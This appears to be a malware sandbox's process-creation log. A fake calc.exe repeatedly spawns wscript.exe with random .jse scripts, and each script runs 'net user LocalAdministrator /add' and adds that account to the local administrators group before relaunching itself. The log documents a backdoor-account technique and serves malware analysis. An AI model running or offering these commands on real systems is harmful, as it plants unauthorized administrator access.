Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" cNs6XgJUw5.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" rbLiDVEIXX.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" UqWLwYRtxi.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iy4J2BVXGi.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" G0MZ6GMwly.jse | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nPYwCIjDlS.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fevGSHOMU4.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jkdKCpQjxW.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iTc0FWDklf.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Ssbk19MNG3.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" R7pPYI1mUq.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xJLmgXOpyA.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nmkcc07AEX.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BqmogIcAUc.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Jtk8zxQOt2.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" PZr1luuECN.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5BgbSwcYMy.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 38gtKBXT3l.jse | |